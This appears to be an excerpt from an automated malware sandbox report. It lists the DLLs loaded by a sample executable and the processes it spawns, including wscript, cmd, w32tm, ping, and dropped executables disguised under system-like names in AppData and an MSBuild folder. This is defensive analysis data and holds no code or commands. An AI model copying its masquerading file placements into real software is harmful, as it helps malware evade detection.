                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: slc.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: sppc.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: userenv.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: pcacli.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: mpr.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: version.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rasapi32.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rasman.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rtutils.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mswsock.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: winhttp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iphlpapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dnsapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: propsys.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dlnashext.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wpdshext.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: edputil.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: urlmon.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iertutil.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: srvcli.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: netutils.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wintypes.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: appresolver.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: bcp47langs.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: slc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: userenv.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sppc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rtutils.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mswsock.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: winhttp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iphlpapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dnsapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: propsys.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dlnashext.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wpdshext.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: edputil.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: urlmon.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iertutil.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: srvcli.dll
